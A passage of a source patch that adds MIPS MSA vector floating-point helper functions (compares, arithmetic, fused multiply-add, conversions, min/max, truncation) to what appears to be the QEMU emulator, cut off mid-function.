DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + MSA_FLOAT_COND(pwx->w[i], le, pws->w[i], pwt->w[i], 32, quiet); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + MSA_FLOAT_COND(pwx->d[i], le, pws->d[i], pwt->d[i], 64, quiet); + } + break; + default: + assert(0); + } + + check_msacsr_cause(env); + + msa_move_v(pwd, pwx); +} + +static inline void compare_ule(CPUMIPSState *env, wr_t *pwd, wr_t *pws, + wr_t *pwt, uint32_t df, int quiet) +{ + wr_t wx, *pwx = &wx; + uint32_t i; + + clear_msacsr_cause(env); + + switch (df) { + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + MSA_FLOAT_ULE(pwx->w[i], pws->w[i], pwt->w[i], 32, quiet); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + MSA_FLOAT_ULE(pwx->d[i], pws->d[i], pwt->d[i], 64, quiet); + } + break; + default: + assert(0); + } + + check_msacsr_cause(env); + + msa_move_v(pwd, pwx); +} + +static inline void compare_or(CPUMIPSState *env, wr_t *pwd, wr_t *pws, + wr_t *pwt, uint32_t df, int quiet) +{ + wr_t wx, *pwx = &wx; + uint32_t i; + + clear_msacsr_cause(env); + + switch (df) { + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + MSA_FLOAT_OR(pwx->w[i], pws->w[i], pwt->w[i], 32, quiet); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + MSA_FLOAT_OR(pwx->d[i], pws->d[i], pwt->d[i], 64, quiet); + } + break; + default: + assert(0); + } + + check_msacsr_cause(env); + + msa_move_v(pwd, pwx); +} + +static inline void compare_une(CPUMIPSState *env, wr_t *pwd, wr_t *pws, + wr_t *pwt, uint32_t df, int quiet) +{ + wr_t wx, *pwx = &wx; + uint32_t i; + + clear_msacsr_cause(env); + + switch (df) { + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + MSA_FLOAT_UNE(pwx->w[i], pws->w[i], pwt->w[i], 32, quiet); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + MSA_FLOAT_UNE(pwx->d[i], pws->d[i], pwt->d[i], 64, quiet); + } + break; + default: + assert(0); + } + + check_msacsr_cause(env); + + msa_move_v(pwd, pwx); +} + +static inline void compare_ne(CPUMIPSState *env, wr_t *pwd, wr_t *pws, + wr_t *pwt, uint32_t df, int quiet) { + wr_t wx, *pwx = &wx; + uint32_t i; + + clear_msacsr_cause(env); + + switch (df) { + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + MSA_FLOAT_NE(pwx->w[i], pws->w[i], pwt->w[i], 32, quiet); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + MSA_FLOAT_NE(pwx->d[i], pws->d[i], pwt->d[i], 64, quiet); + } + break; + default: + assert(0); + } + + check_msacsr_cause(env); + + msa_move_v(pwd, pwx); +} + +void helper_msa_fcaf_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t wt) +{ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); + compare_af(env, pwd, pws, pwt, df, 1); +} + +void helper_msa_fcun_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t wt) +{ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); + compare_un(env, pwd, pws, pwt, df, 1); +} + +void helper_msa_fceq_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t wt) +{ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); + compare_eq(env, pwd, pws, pwt, df, 1); +} + +void helper_msa_fcueq_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t wt) +{ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); + compare_ueq(env, pwd, pws, pwt, df, 1); +} + +void helper_msa_fclt_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t wt) +{ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); + compare_lt(env, pwd, pws, pwt, df, 1); +} + +void helper_msa_fcult_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t wt) +{ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); + compare_ult(env, pwd, pws, pwt, df, 1); +} + +void helper_msa_fcle_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t wt) +{ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); + compare_le(env, pwd, pws, pwt, df, 1); +} + +void helper_msa_fcule_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t wt) +{ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); + compare_ule(env, pwd, pws, pwt, df, 1); +} + +void helper_msa_fsaf_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t wt) +{ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); + compare_af(env, pwd, pws, pwt, df, 0); +} + +void helper_msa_fsun_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t wt) +{ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); + compare_un(env, pwd, pws, pwt, df, 0); +} + +void helper_msa_fseq_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t wt) +{ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); + compare_eq(env, pwd, pws, pwt, df, 0); +} + +void helper_msa_fsueq_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t wt) +{ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); + compare_ueq(env, pwd, pws, pwt, df, 0); +} + +void helper_msa_fslt_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t wt) +{ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); + compare_lt(env, pwd, pws, pwt, df, 0); +} + +void helper_msa_fsult_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t wt) +{ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); + compare_ult(env, pwd, pws, pwt, df, 0); +} + +void helper_msa_fsle_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t wt) +{ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); + compare_le(env, pwd, pws, pwt, df, 0); +} + +void helper_msa_fsule_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t wt) +{ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); + compare_ule(env, pwd, pws, pwt, df, 0); +} + +void helper_msa_fcor_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t wt) +{ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); + compare_or(env, pwd, pws, pwt, df, 1); +} + +void helper_msa_fcune_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t wt) +{ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); + compare_une(env, pwd, pws, pwt, df, 1); +} + +void helper_msa_fcne_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t wt) +{ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); + compare_ne(env, pwd, pws, pwt, df, 1); +} + +void helper_msa_fsor_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t wt) +{ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); + compare_or(env, pwd, pws, pwt, df, 0); +} + +void helper_msa_fsune_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t wt) +{ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); + compare_une(env, pwd, pws, pwt, df, 0); +} + +void helper_msa_fsne_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t wt) +{ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); + compare_ne(env, pwd, pws, pwt, df, 0); +} + +#define float16_is_zero(ARG) 0 +#define float16_is_zero_or_denormal(ARG) 0 + +#define IS_DENORMAL(ARG, BITS) \ + (!float ## BITS ## _is_zero(ARG) \ + && float ## BITS ## _is_zero_or_denormal(ARG)) + +#define MSA_FLOAT_BINOP(DEST, OP, ARG1, ARG2, BITS) \ + do { \ + int c; \ + \ + set_float_exception_flags(0, &env->active_tc.msa_fp_status); \ + DEST = float ## BITS ## _ ## OP(ARG1, ARG2, \ + &env->active_tc.msa_fp_status); \ + c = update_msacsr(env, 0, IS_DENORMAL(DEST, BITS)); \ + \ + if (get_enabled_exceptions(env, c)) { \ + DEST = ((FLOAT_SNAN ## BITS >> 6) << 6) | c; \ + } \ + } while (0) + +void helper_msa_fadd_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t wt) +{ + wr_t wx, *pwx = &wx; + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); + uint32_t i; + + clear_msacsr_cause(env); + + switch (df) { + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + MSA_FLOAT_BINOP(pwx->w[i], add, pws->w[i], pwt->w[i], 32); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + MSA_FLOAT_BINOP(pwx->d[i], add, pws->d[i], pwt->d[i], 64); + } + break; + default: + assert(0); + } + + check_msacsr_cause(env); + msa_move_v(pwd, pwx); +} + +void helper_msa_fsub_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t wt) +{ + wr_t wx, *pwx = &wx; + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); + uint32_t i; + + clear_msacsr_cause(env); + + switch (df) { + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + MSA_FLOAT_BINOP(pwx->w[i], sub, pws->w[i], pwt->w[i], 32); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + MSA_FLOAT_BINOP(pwx->d[i], sub, pws->d[i], pwt->d[i], 64); + } + break; + default: + assert(0); + } + + check_msacsr_cause(env); + msa_move_v(pwd, pwx); +} + +void helper_msa_fmul_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t wt) +{ + wr_t wx, *pwx = &wx; + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); + uint32_t i; + + clear_msacsr_cause(env); + + switch (df) { + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + MSA_FLOAT_BINOP(pwx->w[i], mul, pws->w[i], pwt->w[i], 32); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + MSA_FLOAT_BINOP(pwx->d[i], mul, pws->d[i], pwt->d[i], 64); + } + break; + default: + assert(0); + } + + check_msacsr_cause(env); + + msa_move_v(pwd, pwx); +} + +void helper_msa_fdiv_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t wt) +{ + wr_t wx, *pwx = &wx; + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); + uint32_t i; + + clear_msacsr_cause(env); + + switch (df) { + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + MSA_FLOAT_BINOP(pwx->w[i], div, pws->w[i], pwt->w[i], 32); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + MSA_FLOAT_BINOP(pwx->d[i], div, pws->d[i], pwt->d[i], 64); + } + break; + default: + assert(0); + } + + check_msacsr_cause(env); + + msa_move_v(pwd, pwx); +} + +#define MSA_FLOAT_MULADD(DEST, ARG1, ARG2, ARG3, NEGATE, BITS) \ + do { \ + int c; \ + \ + set_float_exception_flags(0, &env->active_tc.msa_fp_status); \ + DEST = float ## BITS ## _muladd(ARG2, ARG3, ARG1, NEGATE, \ + &env->active_tc.msa_fp_status); \ + c = update_msacsr(env, 0, IS_DENORMAL(DEST, BITS)); \ + \ + if (get_enabled_exceptions(env, c)) { \ + DEST = ((FLOAT_SNAN ## BITS >> 6) << 6) | c; \ + } \ + } while (0) + +void helper_msa_fmadd_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t wt) +{ + wr_t wx, *pwx = &wx; + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); + uint32_t i; + + clear_msacsr_cause(env); + + switch (df) { + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + MSA_FLOAT_MULADD(pwx->w[i], pwd->w[i], + pws->w[i], pwt->w[i], 0, 32); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + MSA_FLOAT_MULADD(pwx->d[i], pwd->d[i], + pws->d[i], pwt->d[i], 0, 64); + } + break; + default: + assert(0); + } + + check_msacsr_cause(env); + + msa_move_v(pwd, pwx); +} + +void helper_msa_fmsub_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t wt) +{ + wr_t wx, *pwx = &wx; + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); + uint32_t i; + + clear_msacsr_cause(env); + + switch (df) { + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + MSA_FLOAT_MULADD(pwx->w[i], pwd->w[i], + pws->w[i], pwt->w[i], + float_muladd_negate_product, 32); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + MSA_FLOAT_MULADD(pwx->d[i], pwd->d[i], + pws->d[i], pwt->d[i], + float_muladd_negate_product, 64); + } + break; + default: + assert(0); + } + + check_msacsr_cause(env); + + msa_move_v(pwd, pwx); +} + +void helper_msa_fexp2_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t wt) +{ + wr_t wx, *pwx = &wx; + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); + uint32_t i; + + clear_msacsr_cause(env); + + switch (df) { + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + MSA_FLOAT_BINOP(pwx->w[i], scalbn, pws->w[i], + pwt->w[i] > 0x200 ? 0x200 : + pwt->w[i] < -0x200 ? -0x200 : pwt->w[i], + 32); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + MSA_FLOAT_BINOP(pwx->d[i], scalbn, pws->d[i], + pwt->d[i] > 0x1000 ? 0x1000 : + pwt->d[i] < -0x1000 ? -0x1000 : pwt->d[i], + 64); + } + break; + default: + assert(0); + } + + check_msacsr_cause(env); + + msa_move_v(pwd, pwx); +} + +#define MSA_FLOAT_UNOP(DEST, OP, ARG, BITS) \ + do { \ + int c; \ + \ + set_float_exception_flags(0, &env->active_tc.msa_fp_status); \ + DEST = float ## BITS ## _ ## OP(ARG, &env->active_tc.msa_fp_status);\ + c = update_msacsr(env, 0, IS_DENORMAL(DEST, BITS)); \ + \ + if (get_enabled_exceptions(env, c)) { \ + DEST = ((FLOAT_SNAN ## BITS >> 6) << 6) | c; \ + } \ + } while (0) + +void helper_msa_fexdo_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t wt) +{ + wr_t wx, *pwx = &wx; + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); + uint32_t i; + + switch (df) { + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + /* Half precision floats come in two formats: standard + IEEE and "ARM" format. The latter gains extra exponent + range by omitting the NaN/Inf encodings. */ + flag ieee = 1; + + MSA_FLOAT_BINOP(Lh(pwx, i), from_float32, pws->w[i], ieee, 16); + MSA_FLOAT_BINOP(Rh(pwx, i), from_float32, pwt->w[i], ieee, 16); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + MSA_FLOAT_UNOP(Lw(pwx, i), from_float64, pws->d[i], 32); + MSA_FLOAT_UNOP(Rw(pwx, i), from_float64, pwt->d[i], 32); + } + break; + default: + assert(0); + } + + check_msacsr_cause(env); + msa_move_v(pwd, pwx); +} + +#define MSA_FLOAT_UNOP_XD(DEST, OP, ARG, BITS, XBITS) \ + do { \ + int c; \ + \ + set_float_exception_flags(0, &env->active_tc.msa_fp_status); \ + DEST = float ## BITS ## _ ## OP(ARG, &env->active_tc.msa_fp_status);\ + c = update_msacsr(env, CLEAR_FS_UNDERFLOW, 0); \ + \ + if (get_enabled_exceptions(env, c)) { \ + DEST = ((FLOAT_SNAN ## XBITS >> 6) << 6) | c; \ + } \ + } while (0) + +void helper_msa_ftq_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t wt) +{ + wr_t wx, *pwx = &wx; + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); + uint32_t i; + + clear_msacsr_cause(env); + + switch (df) { + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + MSA_FLOAT_UNOP_XD(Lh(pwx, i), to_q16, pws->w[i], 32, 16); + MSA_FLOAT_UNOP_XD(Rh(pwx, i), to_q16, pwt->w[i], 32, 16); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + MSA_FLOAT_UNOP_XD(Lw(pwx, i), to_q32, pws->d[i], 64, 32); + MSA_FLOAT_UNOP_XD(Rw(pwx, i), to_q32, pwt->d[i], 64, 32); + } + break; + default: + assert(0); + } + + check_msacsr_cause(env); + + msa_move_v(pwd, pwx); +} + +#define NUMBER_QNAN_PAIR(ARG1, ARG2, BITS) \ + !float ## BITS ## _is_any_nan(ARG1) \ + && float ## BITS ## _is_quiet_nan(ARG2) + +#define MSA_FLOAT_MAXOP(DEST, OP, ARG1, ARG2, BITS) \ + do { \ + int c; \ + \ + set_float_exception_flags(0, &env->active_tc.msa_fp_status); \ + DEST = float ## BITS ## _ ## OP(ARG1, ARG2, \ + &env->active_tc.msa_fp_status); \ + c = update_msacsr(env, 0, 0); \ + \ + if (get_enabled_exceptions(env, c)) { \ + DEST = ((FLOAT_SNAN ## BITS >> 6) << 6) | c; \ + } \ + } while (0) + +#define FMAXMIN_A(F, G, X, _S, _T, BITS) \ + do { \ + uint## BITS ##_t S = _S, T = _T; \ + uint## BITS ##_t as, at, xs, xt, xd; \ + if (NUMBER_QNAN_PAIR(S, T, BITS)) { \ + T = S; \ + } \ + else if (NUMBER_QNAN_PAIR(T, S, BITS)) { \ + S = T; \ + } \ + as = float## BITS ##_abs(S); \ + at = float## BITS ##_abs(T); \ + MSA_FLOAT_MAXOP(xs, F, S, T, BITS); \ + MSA_FLOAT_MAXOP(xt, G, S, T, BITS); \ + MSA_FLOAT_MAXOP(xd, F, as, at, BITS); \ + X = (as == at || xd == float## BITS ##_abs(xs)) ? xs : xt; \ + } while (0) + +void helper_msa_fmin_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t wt) +{ + wr_t wx, *pwx = &wx; + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); + uint32_t i; + + clear_msacsr_cause(env); + + switch (df) { + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + if (NUMBER_QNAN_PAIR(pws->w[i], pwt->w[i], 32)) { + MSA_FLOAT_MAXOP(pwx->w[i], min, pws->w[i], pws->w[i], 32); + } else if (NUMBER_QNAN_PAIR(pwt->w[i], pws->w[i], 32)) { + MSA_FLOAT_MAXOP(pwx->w[i], min, pwt->w[i], pwt->w[i], 32); + } else { + MSA_FLOAT_MAXOP(pwx->w[i], min, pws->w[i], pwt->w[i], 32); + } + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + if (NUMBER_QNAN_PAIR(pws->d[i], pwt->d[i], 64)) { + MSA_FLOAT_MAXOP(pwx->d[i], min, pws->d[i], pws->d[i], 64); + } else if (NUMBER_QNAN_PAIR(pwt->d[i], pws->d[i], 64)) { + MSA_FLOAT_MAXOP(pwx->d[i], min, pwt->d[i], pwt->d[i], 64); + } else { + MSA_FLOAT_MAXOP(pwx->d[i], min, pws->d[i], pwt->d[i], 64); + } + } + break; + default: + assert(0); + } + + check_msacsr_cause(env); + + msa_move_v(pwd, pwx); +} + +void helper_msa_fmin_a_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t wt) +{ + wr_t wx, *pwx = &wx; + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); + uint32_t i; + + clear_msacsr_cause(env); + + switch (df) { + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + FMAXMIN_A(min, max, pwx->w[i], pws->w[i], pwt->w[i], 32); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + FMAXMIN_A(min, max, pwx->d[i], pws->d[i], pwt->d[i], 64); + } + break; + default: + assert(0); + } + + check_msacsr_cause(env); + + msa_move_v(pwd, pwx); +} + +void helper_msa_fmax_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t wt) +{ + wr_t wx, *pwx = &wx; + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); + uint32_t i; + + clear_msacsr_cause(env); + + switch (df) { + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + if (NUMBER_QNAN_PAIR(pws->w[i], pwt->w[i], 32)) { + MSA_FLOAT_MAXOP(pwx->w[i], max, pws->w[i], pws->w[i], 32); + } else if (NUMBER_QNAN_PAIR(pwt->w[i], pws->w[i], 32)) { + MSA_FLOAT_MAXOP(pwx->w[i], max, pwt->w[i], pwt->w[i], 32); + } else { + MSA_FLOAT_MAXOP(pwx->w[i], max, pws->w[i], pwt->w[i], 32); + } + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + if (NUMBER_QNAN_PAIR(pws->d[i], pwt->d[i], 64)) { + MSA_FLOAT_MAXOP(pwx->d[i], max, pws->d[i], pws->d[i], 64); + } else if (NUMBER_QNAN_PAIR(pwt->d[i], pws->d[i], 64)) { + MSA_FLOAT_MAXOP(pwx->d[i], max, pwt->d[i], pwt->d[i], 64); + } else { + MSA_FLOAT_MAXOP(pwx->d[i], max, pws->d[i], pwt->d[i], 64); + } + } + break; + default: + assert(0); + } + + check_msacsr_cause(env); + + msa_move_v(pwd, pwx); +} + +void helper_msa_fmax_a_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t wt) +{ + wr_t wx, *pwx = &wx; + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); + uint32_t i; + + clear_msacsr_cause(env); + + switch (df) { + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + FMAXMIN_A(max, min, pwx->w[i], pws->w[i], pwt->w[i], 32); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + FMAXMIN_A(max, min, pwx->d[i], pws->d[i], pwt->d[i], 64); + } + break; + default: + assert(0); + } + + check_msacsr_cause(env); + + msa_move_v(pwd, pwx); +} + +void helper_msa_fclass_df(CPUMIPSState *env, uint32_t df, + uint32_t wd, uint32_t ws) +{ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + if (df == DF_WORD) { + pwd->w[0] = helper_float_class_s(pws->w[0]); + pwd->w[1] = helper_float_class_s(pws->w[1]); + pwd->w[2] = helper_float_class_s(pws->w[2]); + pwd->w[3] = helper_float_class_s(pws->w[3]); + } else { + pwd->d[0] = helper_float_class_d(pws->d[0]); + pwd->d[1] = helper_float_class_d(pws->d[1]); + } +} + +#define MSA_FLOAT_UNOP0(DEST, OP, ARG, BITS) \ + do { \ + int c; \ + \ + set_float_exception_flags(0, &env->active_tc.msa_fp_status); \ + DEST = float ## BITS ## _ ## OP(ARG, &env->active_tc.msa_fp_status);\ + c = update_msacsr(env, CLEAR_FS_UNDERFLOW, 0); \ + \ + if (get_enabled_exceptions(env, c)) { \ + DEST = ((FLOAT_SNAN ## BITS >> 6) << 6) | c; \ + } else if (float ## BITS ## _is_any_nan(ARG)) { \ + DEST = 0; \ + } \ + } while (0) + +void helper_msa_ftrunc_s_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws) +{ + wr_t wx, *pwx = &wx; + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + uint32_t i; + + clear_msacsr_cause(env); + + switch (df) { + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + MSA_FLOAT_UNOP0(pwx->w[i], to_int32_round_to_zero, pws->w[i], 32); + } + break; + case DF_DOUBLE: + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + MSA_FLOAT_UNOP0(pwx->d[i], to_int64_round_to_zero, pws->d[i], 64); + } + break; + default: + assert(0); + } + + check_msacsr_cause(env); + + msa_move_v(pwd, pwx); +} + +void helper_msa_ftrunc_u_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws) +{ + wr_t wx, *pwx = &wx; + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws 